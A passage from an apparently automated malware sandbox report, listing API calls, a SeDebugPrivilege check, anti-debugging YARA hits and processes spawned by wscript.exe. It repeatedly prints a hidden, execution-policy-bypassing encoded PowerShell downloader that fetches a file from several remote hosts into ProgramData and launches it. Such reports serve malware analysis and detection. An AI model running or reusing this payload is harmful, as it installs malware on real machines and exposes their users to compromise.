BzAHUAbABvAHAAdQBwAGkAbABsAGEAcgB5ACAAPQAgADUANgA7ACQAQQBkAGUAbABvAGMAbwBkAG8AbgBpAGMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAEUAQQBMAGcAQQB4AEEARABrAEEATQB3AEEAdQBBAEQAUQBBAE0AdwBBAHUAQQBEAGsAQQBPAEEAQQB2AEEARQBFAEEAUgB3AEIAMgBBAEYAbwBBAGEAQQBBADQAQQBFAE0AQQBMAHcAQgBYAEEASABjAEEAZQBnAEIAegBBAEgATQBBAFUAQQBCAHEAQQBHAFkAQQBkAGcAQgA2AEEARQBZAEEAUABaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAYwBBAEwAZwBBADUAQQBEAEUAQQBMAGcAQQA0AEEARABjAEEATABnAEEAeABBAEQAVQBBAE8AQQBBAHYAQQBIAFUAQQBWAGcAQgAzAEEARwAwAEEATQBBAEIAQgBBAEMAOABBAE8AQQBCADYAQQBIAEkAQQBXAEEAQQA0AEEAQQA9AD0AUABaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQARQBBAEwAZwBBAHgAQQBEAGsAQQBNAHcAQQB1AEEARABRAEEATQB3AEEAdQBBAEQARQBBAE0AQQBBAHgAQQBDADgAQQBhAEEAQQAzAEEARABFAEEATAB3AEIASQBBAEYAUQBBAGMAQQBBADMAQQBFAHMAQQBlAFEAQgBhAEEARABRAEEAUABaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAawBBAEwAZwBBAHgAQQBEAE0AQQBOAHcAQQB1AEEARABJAEEATgBBAEEANABBAEMANABBAE0AUQBBADIAQQBEAE0AQQBMAHcAQgBZAEEARwA0AEEAVQBRAEIAawBBAEQASQBBAFkAZwBCAE0AQQBDADgAQQBaAHcAQgBrAEEARwBjAEEAVgBBAEIAbgBBAEcATQBBAFMAdwBCAG4AQQBHADAAQQBOAFEAQQA9AFAAWgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGMAQQBMAGcAQQA1AEEARABFAEEATABnAEEANABBAEQAYwBBAEwAZwBBAHgAQQBEAGsAQQBPAEEAQQB2AEEASABFAEEAWgBnAEIAaQBBAEcAWQBBAGQAUQBBAHYAQQBGAFkAQQBiAGcAQgB6AEEARABNAEEAUwBBAEIAbQBBAEcAYwBBAGMAQQBCAG8AQQBHAEkAQQBjAEEAQQB3AEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAUAByAGUAZgBpAGcAdQByAGUAcwBVAG4AdwByAGEAcABwAGUAcgAgAGkAbgAgACQAQQBkAGUAbABvAGMAbwBkAG8AbgBpAGMAIAAtAHMAcABsAGkAdAAgACIAUABaACIAKQAgAHsAJABHAHUAcwBoAGkAbgBnACAAPQAgADUANAA2ADsAJABVAG4AZQB4AHQAcgBhAGMAdABlAGQARABlAGwAaQBnAGgAdAAgAD0AIAAiAEUAdABoAHkAbABhAHQAaQBvAG4AIgA7AHQAcgB5ACAAewAkAGkAbgBmAGUAcgB0AGkAbABlAEEAZQBzAGMAdQBsAGEAYwBlAG8AdQBzACAAPQAgACIAZwBsAG8AcwBzAGEAcgBpAHoAZQAiADsAJABOAG8AbgBlAHgAcABvAHMAdQByAGUAVAByAGEAbgBzAG0AaQB0AHQAYQBiAGkAbABpAHQAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABQAHIAZQBmAGkAZwB1AHIAZQBzAFUAbgB3AHIAYQBwAHAAZQByACkAKQA7AHcAZwBlAHQAIAAkAE4AbwBuAGUAeABwAG8AcwB1AHIAZQBUAHIAYQBuAHMAbQBpAHQAdABhAGIAaQBsAGkAdAB5ACAALQBPACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAYgBpAHQAdABlAHIAcwB3AGUAZQB0AHMATQBpAGwAawBsAGkAawBlAC4AbABvAHYAYQBiAGwAeQBVAG4AcwBhAHcAZQBkADsAJABjAG8AbQBtAGUAbQBvAHIAYQB0AGkAdgBlAG4AZQBzAHMATQBvAG4AbwBzAHkAbgBhAHAAdABpAGMAYQBsAGwAeQAgAD0AIAAyADMAOAA7ACQAcgBlAHMAaQBsAGkAdQBtACAAPQAgADkAMgA3ADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGIAaQB0AHQAZQByAHMAdwBlAGUAdABzAE0AaQBsAGsAbABpAGsAZQAuAGwAbwB2AGEAYgBsAHkAVQBuAHMAYQB3AGUAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEANQA0ADMANgA2ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBZAGcAQgBwAEEASABRAEEAZABBAEIAbABBAEgASQBBAGMAdwBCADMAQQBHAFUAQQBaAFEAQgAwAEEASABNAEEAVABRAEIAcABBAEcAdwBBAGEAdwBCAHMAQQBHAGsAQQBhAHcAQgBsAEEAQwA0AEEAYgBBAEIAdgBBAEgAWQBBAFkAUQBCAGkAQQBHAHcAQQBlAFEAQgBWAEEARwA0AEEAYwB3AEIAaABBAEgAYwBBAFoAUQBCAGsAQQBDAHcAQQBjAEEAQgB5AEEARwBrAEEAYgBnAEIAMABBAEQAcwBBACIAOwAkAEcAaQBuAGcAZQByAG4AZQBzAHMAUgBlAHQAcgBvAGMAZQBjAGEAbAAgAD0AIAAiAEQAZQByAGUAbABpAG4AcQB1AGkAcwBoAEcAYQBtAGUAbABvAHQAdABlACIAOwAkAFMAcABvAG8AZgBzACAAPQAgACIAbgB1AG0AaQBuAGkAcwBtACIAOwBiAHIAZQBhAGsAOwB9AFIAZQBhAGMAdABEAE8ATQA7AH0AIABjAGEAdABjAGgAIAB7ACQAUwBhAGwAdAB1AHMAZQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBMAEEARwBVAEEAYgBRAEIAdwBBAEcAdwBBAFoAUQBCAEQAQQBIAEkAQQBiAHcAQgB6AEEASABNAEEAWQBnAEIAdgBBAEcANABBAFoAUQBCAHoAQQBDADQAQQBZAHcAQgBoAEEASABNAEEAYQBRAEIAdQBBAEcAOABBACIAOwAkAGEAbgB0AGkAYwBsAGkAbQBhAGMAdABpAGMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAGcAQQAwAEEAQwA0AEEATgBBAEEAeQBBAEMANABBAE4AUQBBAHcAQQBDADQAQQBNAGcAQQAwAEEARABBAEEAIgA7ACQAUABhAGwAbQBpAHAAZQBkAFQAbwBjAG8AbABvAGcAaQBjAGEAbAAgAD0AIAA2ADIAOwB9AH0AJABiAGUAcwBjAG8AdQByAGcAZQAgAD0AIAA5ADUAOQA7ACQAbQBhAGMAZQBkAG8AaQBuAGUAUgBhAHQAdABsAGkAbgBnACAAPQAgACIAcABlAGwAbwBwAGkAZABTAHEAdQBhAHQAdABvAGMAcgBhAGMAeQAiADsA" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000348	1	1
ShellExecuteExW May 12, 2023, 9:26 a.m.	show_type: 0 filepath_r: powershell parameters: -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABtAG8AbwByAGUAcwBzAFQAYQByAHQAYQByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABJAEEATgB3AEEAdQBBAEQARQBBAE4AQQBBADEAQQBDADQAQQBNAFEAQQAxAEEARABJAEEATABnAEEAeABBAEQAZwBBAE8AUQBBAD0ASQBoAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAZwBBAGIAdwBCAHQAQQBHADgAQQBaAHcAQgBsAEEARwA0AEEAWgBRAEIAaABBAEcAdwBBAEwAZwBCAHEAQQBIAEEAQQBJAGgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABBAEEATgBnAEEAdQBBAEQASQBBAE4AQQBBADIAQQBDADQAQQBNAGcAQQB3AEEARABBAEEATABnAEEAeABBAEQARQBBAE4AUQBBAD0AIgA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEAMwA7ACQAdQBwAHIAYQBpAHMAZQBkAEYAaQBsAGUAcwBhAHYAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAG8AQQBIAGsAQQBjAEEAQgB1AEEARwA4AEEAZABBAEIAcABBAEgAbwBBAFoAUQBBAHUAQQBHAFkAQQBkAFEAQgAwAEEARwBJAEEAYgB3AEIAcwBBAEEAPQA9AFIASABDAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUgBBAEgAVQBBAGEAUQBCAHUAQQBHAEUAQQBjAGcAQgBwAEEARwBFAEEAYgBnAEIASgBBAEcANABBAFoAZwBCAGgAQQBHADQAQQBaAHcAQgBzAEEARwBVAEEAYgBRAEIAbABBAEcANABBAGQAQQBBAHUAQQBHADAAQQBiAGcAQQA9ACIAOwAkAFMAZQBtAGkAaABhAHIAZABDAGEAcABzAHUAbABvAHAAdQBwAGkAbABsAGEAcgB5ACAAPQAgADUANgA7ACQAQQBkAGUAbABvAGMAbwBkAG8AbgBpAGMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAEUAQQBMAGcAQQB4AEEARABrAEEATQB3AEEAdQBBAEQAUQBBAE0AdwBBAHUAQQBEAGsAQQBPAEEAQQB2AEEARQBFAEEAUgB3AEIAMgBBAEYAbwBBAGEAQQBBADQAQQBFAE0AQQBMAHcAQgBYAEEASABjAEEAZQBnAEIAegBBAEgATQBBAFUAQQBCAHEAQQBHAFkAQQBkAGcAQgA2AEEARQBZAEEAUABaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAYwBBAEwAZwBBADUAQQBEAEUAQQBMAGcAQQA0AEEARABjAEEATABnAEEAeABBAEQAVQBBAE8AQQBBAHYAQQBIAFUAQQBWAGcAQgAzAEEARwAwAEEATQBBAEIAQgBBAEMAOABBAE8AQQBCADYAQQBIAEkAQQBXAEEAQQA0AEEAQQA9AD0AUABaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQARQBBAEwAZwBBAHgAQQBEAGsAQQBNAHcAQQB1AEEARABRAEEATQB3AEEAdQBBAEQARQBBAE0AQQBBAHgAQQBDADgAQQBhAEEAQQAzAEEARABFAEEATAB3AEIASQBBAEYAUQBBAGMAQQBBADMAQQBFAHMAQQBlAFEAQgBhAEEARABRAEEAUABaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAawBBAEwAZwBBAHgAQQBEAE0AQQBOAHcAQQB1AEEARABJAEEATgBBAEEANABBAEMANABBAE0AUQBBADIAQQBEAE0AQQBMAHcAQgBZAEEARwA0AEEAVQBRAEIAawBBAEQASQBBAFkAZwBCAE0AQQBDADgAQQBaAHcAQgBrAEEARwBjAEEAVgBBAEIAbgBBAEcATQBBAFMAdwBCAG4AQQBHADAAQQBOAFEAQQA9AFAAWgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGMAQQBMAGcAQQA1AEEARABFAEEATABnAEEANABBAEQAYwBBAEwAZwBBAHgAQQBEAGsAQQBPAEEAQQB2AEEASABFAEEAWgBnAEIAaQBBAEcAWQBBAGQAUQBBAHYAQQBGAFkAQQBiAGcAQgB6AEEARABNAEEAUwBBAEIAbQBBAEcAYwBBAGMAQQBCAG8AQQBHAEkAQQBjAEEAQQB3AEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAUAByAGUAZgBpAGcAdQByAGUAcwBVAG4AdwByAGEAcABwAGUAcgAgAGkAbgAgACQAQQBkAGUAbABvAGMAbwBkAG8AbgBpAGMAIAAtAHMAcABsAGkAdAAgACIAUABaACIAKQAgAHsAJABHAHUAcwBoAGkAbgBnACAAPQAgADUANAA2ADsAJABVAG4AZQB4AHQAcgBhAGMAdABlAGQARABlAGwAaQBnAGgAdAAgAD0AIAAiAEUAdABoAHkAbABhAHQAaQBvAG4AIgA7AHQAcgB5ACAAewAkAGkAbgBmAGUAcgB0AGkAbABlAEEAZQBzAGMAdQBsAGEAYwBlAG8AdQBzACAAPQAgACIAZwBsAG8AcwBzAGEAcgBpAHoAZQAiADsAJABOAG8AbgBlAHgAcABvAHMAdQByAGUAVAByAGEAbgBzAG0AaQB0AHQAYQBiAGkAbABpAHQAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABQAHIAZQBmAGkAZwB1AHIAZQBzAFUAbgB3AHIAYQBwAHAAZQByACkAKQA7AHcAZwBlAHQAIAAkAE4AbwBuAGUAeABwAG8AcwB1AHIAZQBUAHIAYQBuAHMAbQBpAHQAdABhAGIAaQBsAGkAdAB5ACAALQBPACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAYgBpAHQAdABlAHIAcwB3AGUAZQB0AHMATQBpAGwAawBsAGkAawBlAC4AbABvAHYAYQBiAGwAeQBVAG4AcwBhAHcAZQBkADsAJABjAG8AbQBtAGUAbQBvAHIAYQB0AGkAdgBlAG4AZQBzAHMATQBvAG4AbwBzAHkAbgBhAHAAdABpAGMAYQBsAGwAeQAgAD0AIAAyADMAOAA7ACQAcgBlAHMAaQBsAGkAdQBtACAAPQAgADkAMgA3ADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGIAaQB0AHQAZQByAHMAdwBlAGUAdABzAE0AaQBsAGsAbABpAGsAZQAuAGwAbwB2AGEAYgBsAHkAVQBuAHMAYQB3AGUAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEANQA0ADMANgA2ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBZAGcAQgBwAEEASABRAEEAZABBAEIAbABBAEgASQBBAGMAdwBCADMAQQBHAFUAQQBaAFEAQgAwAEEASABNAEEAVABRAEIAcABBAEcAdwBBAGEAdwBCAHMAQQBHAGsAQQBhAHcAQgBsAEEAQwA0AEEAYgBBAEIAdgBBAEgAWQBBAFkAUQBCAGkAQQBHAHcAQQBlAFEAQgBWAEEARwA0AEEAYwB3AEIAaABBAEgAYwBBAFoAUQBCAGsAQQBDAHcAQQBjAEEAQgB5AEEARwBrAEEAYgBnAEIAMABBAEQAcwBBACIAOwAkAEcAaQBuAGcAZQByAG4AZQBzAHMAUgBlAHQAcgBvAGMAZQBjAGEAbAAgAD0AIAAiAEQAZQByAGUAbABpAG4AcQB1AGkAcwBoAEcAYQBtAGUAbABvAHQAdABlACIAOwAkAFMAcABvAG8AZgBzACAAPQAgACIAbgB1AG0AaQBuAGkAcwBtACIAOwBiAHIAZQBhAGsAOwB9AFIAZQBhAGMAdABEAE8ATQA7AH0AIABjAGEAdABjAGgAIAB7ACQAUwBhAGwAdAB1AHMAZQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBMAEEARwBVAEEAYgBRAEIAdwBBAEcAdwBBAFoAUQBCAEQAQQBIAEkAQQBiAHcAQgB6AEEASABNAEEAWQBnAEIAdgBBAEcANABBAFoAUQBCAHoAQQBDADQAQQBZAHcAQgBoAEEASABNAEEAYQBRAEIAdQBBAEcAOABBACIAOwAkAGEAbgB0AGkAYwBsAGkAbQBhAGMAdABpAGMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAGcAQQAwAEEAQwA0AEEATgBBAEEAeQBBAEMANABBAE4AUQBBAHcAQQBDADQAQQBNAGcAQQAwAEEARABBAEEAIgA7ACQAUABhAGwAbQBpAHAAZQBkAFQAbwBjAG8AbABvAGcAaQBjAGEAbAAgAD0AIAA2ADIAOwB9AH0AJABiAGUAcwBjAG8AdQByAGcAZQAgAD0AIAA5ADUAOQA7ACQAbQBhAGMAZQBkAG8AaQBuAGUAUgBhAHQAdABsAGkAbgBnACAAPQAgACIAcABlAGwAbwBwAGkAZABTAHEAdQBhAHQAdABvAGMAcgBhAGMAeQAiADsA" filepath: powershell	1	1

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW May 12, 2023, 9:26 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (16 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

One or more non-whitelisted processes were created (4 events)

parent_process	wscript.exe	martian_process	powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABtAG8AbwByAGUAcwBzAFQAYQByAHQAYQByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABJAEEATgB3AEEAdQBBAEQARQBBAE4AQQBBADEAQQBDADQAQQBNAFEAQQAxAEEARABJAEEATABnAEEAeABBAEQAZwBBAE8AUQBBAD0ASQBoAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAZwBBAGIAdwBCAHQAQQBHADgAQQBaAHcAQgBsAEEARwA0AEEAWgBRAEIAaABBAEcAdwBBAEwAZwBCAHEAQQBIAEEAQQBJAGgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABBAEEATgBnAEEAdQBBAEQASQBBAE4AQQBBADIAQQBDADQAQQBNAGcAQQB3AEEARABBAEEATABnAEEAeABBAEQARQBBAE4AUQBBAD0AIgA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEAMwA7ACQAdQBwAHIAYQBpAHMAZQBkAEYAaQBsAGUAcwBhAHYAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAG8AQQBIAGsAQQBjAEEAQgB1AEEARwA4AEEAZABBAEIAcABBAEgAbwBBAFoAUQBBAHUAQQBHAFkAQQBkAFEAQgAwAEEARwBJAEEAYgB3AEIAcwBBAEEAPQA9AFIASABDAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUgBBAEgAVQBBAGEAUQBCAHUAQQBHAEUAQQBjAGcAQgBwAEEARwBFAEEAYgBnAEIASgBBAEcANABBAFoAZwBCAGgAQQBHADQAQQBaAHcAQgBzAEEARwBVAEEAYgBRAEIAbABBAEcANABBAGQAQQBBAHUAQQBHADAAQQBiAGcAQQA9ACIAOwAkAFMAZQBtAGkAaABhAHIAZABDAGEAcABzAHUAbABvAHAAdQBwAGkAbABsAGEAcgB5ACAAPQAgADUANgA7ACQAQQBkAGUAbABvAGMAbwBkAG8AbgBpAGMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAEUAQQBMAGcAQQB4AEEARABrAEEATQB3AEEAdQBBAEQAUQBBAE0AdwBBAHUAQQBEAGsAQQBPAEEAQQB2AEEARQBFAEEAUgB3AEIAMgBBAEYAbwBBAGEAQQBBADQAQQBFAE0AQQBMAHcAQgBYAEEASABjAEEAZQBnAEIAegBBAEgATQBBAFUAQQBCAHEAQQBHAFkAQQBkAGcAQgA2AEEARQBZAEEAUABaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAYwBBAEwAZwBBADUAQQBEAEUAQQBMAGcAQQA0AEEARABjAEEATABnAEEAeABBAEQAVQBBAE8AQQBBAHYAQQBIAFUAQQBWAGcAQgAzAEEARwAwAEEATQBBAEIAQgBBAEMAOABBAE8AQQBCADYAQQBIAEkAQQBXAEEAQQA0AEEAQQA9AD0AUABaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQARQBBAEwAZwBBAHgAQQBEAGsAQQBNAHcAQQB1AEEARABRAEEATQB3AEEAdQBBAEQARQBBAE0AQQBBAHgAQQBDADgAQQBhAEEAQQAzAEEARABFAEEATAB3AEIASQBBAEYAUQBBAGMAQQBBADMAQQBFAHMAQQBlAFEAQgBhAEEARABRAEEAUABaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAawBBAEwAZwBBAHgAQQBEAE0AQQBOAHcAQQB1AEEARABJAEEATgBBAEEANABBAEMANABBAE0AUQBBADIAQQBEAE0AQQBMAHcAQgBZAEEARwA0AEEAVQBRAEIAawBBAEQASQBBAFkAZwBCAE0AQQBDADgAQQBaAHcAQgBrAEEARwBjAEEAVgBBAEIAbgBBAEcATQBBAFMAdwBCAG4AQQBHADAAQQBOAFEAQQA9AFAAWgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGMAQQBMAGcAQQA1AEEARABFAEEATABnAEEANABBAEQAYwBBAEwAZwBBAHgAQQBEAGsAQQBPAEEAQQB2AEEASABFAEEAWgBnAEIAaQBBAEcAWQBBAGQAUQBBAHYAQQBGAFkAQQBiAGcAQgB6AEEARABNAEEAUwBBAEIAbQBBAEcAYwBBAGMAQQBCAG8AQQBHAEkAQQBjAEEAQQB3AEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAUAByAGUAZgBpAGcAdQByAGUAcwBVAG4AdwByAGEAcABwAGUAcgAgAGkAbgAgACQAQQBkAGUAbABvAGMAbwBkAG8AbgBpAGMAIAAtAHMAcABsAGkAdAAgACIAUABaACIAKQAgAHsAJABHAHUAcwBoAGkAbgBnACAAPQAgADUANAA2ADsAJABVAG4AZQB4AHQAcgBhAGMAdABlAGQARABlAGwAaQBnAGgAdAAgAD0AIAAiAEUAdABoAHkAbABhAHQAaQBvAG4AIgA7AHQAcgB5ACAAewAkAGkAbgBmAGUAcgB0AGkAbABlAEEAZQBzAGMAdQBsAGEAYwBlAG8AdQBzACAAPQAgACIAZwBsAG8AcwBzAGEAcgBpAHoAZQAiADsAJABOAG8AbgBlAHgAcABvAHMAdQByAGUAVAByAGEAbgBzAG0AaQB0AHQAYQBiAGkAbABpAHQAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABQAHIAZQBmAGkAZwB1AHIAZQBzAFUAbgB3AHIAYQBwAHAAZQByACkAKQA7AHcAZwBlAHQAIAAkAE4AbwBuAGUAeABwAG8AcwB1AHIAZQBUAHIAYQBuAHMAbQBpAHQAdABhAGIAaQBsAGkAdAB5ACAALQBPACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAYgBpAHQAdABlAHIAcwB3AGUAZQB0AHMATQBpAGwAawBsAGkAawBlAC4AbABvAHYAYQBiAGwAeQBVAG4AcwBhAHcAZQBkADsAJABjAG8AbQBtAGUAbQBvAHIAYQB0AGkAdgBlAG4AZQBzAHMATQBvAG4AbwBzAHkAbgBhAHAAdABpAGMAYQBsAGwAeQAgAD0AIAAyADMAOAA7ACQAcgBlAHMAaQBsAGkAdQBtACAAPQAgADkAMgA3ADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGIAaQB0AHQAZQByAHMAdwBlAGUAdABzAE0AaQBsAGsAbABpAGsAZQAuAGwAbwB2AGEAYgBsAHkAVQBuAHMAYQB3AGUAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEANQA0ADMANgA2ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBZAGcAQgBwAEEASABRAEEAZABBAEIAbABBAEgASQBBAGMAdwBCADMAQQBHAFUAQQBaAFEAQgAwAEEASABNAEEAVABRAEIAcABBAEcAdwBBAGEAdwBCAHMAQQBHAGsAQQBhAHcAQgBsAEEAQwA0AEEAYgBBAEIAdgBBAEgAWQBBAFkAUQBCAGkAQQBHAHcAQQBlAFEAQgBWAEEARwA0AEEAYwB3AEIAaABBAEgAYwBBAFoAUQBCAGsAQQBDAHcAQQBjAEEAQgB5AEEARwBrAEEAYgBnAEIAMABBAEQAcwBBACIAOwAkAEcAaQBuAGcAZQByAG4AZQBzAHMAUgBlAHQAcgBvAGMAZQBjAGEAbAAgAD0AIAAiAEQAZQByAGUAbABpAG4AcQB1AGkAcwBoAEcAYQBtAGUAbABvAHQAdABlACIAOwAkAFMAcABvAG8AZgBzACAAPQAgACIAbgB1AG0AaQBuAGkAcwBtACIAOwBiAHIAZQBhAGsAOwB9AFIAZQBhAGMAdABEAE8ATQA7AH0AIABjAGEAdABjAGgAIAB7ACQAUwBhAGwAdAB1AHMAZQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBMAEEARwBVAEEAYgBRAEIAdwBBAEcAdwBBAFoAUQBCAEQAQQBIAEkAQQBiAHcAQgB6AEEASABNAEEAWQBnAEIAdgBBAEcANABBAFoAUQBCAHoAQQBDADQAQQBZAHcAQgBoAEEASABNAEEAYQBRAEIAdQBBAEcAOABBACIAOwAkAGEAbgB0AGkAYwBsAGkAbQBhAGMAdABpAGMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQB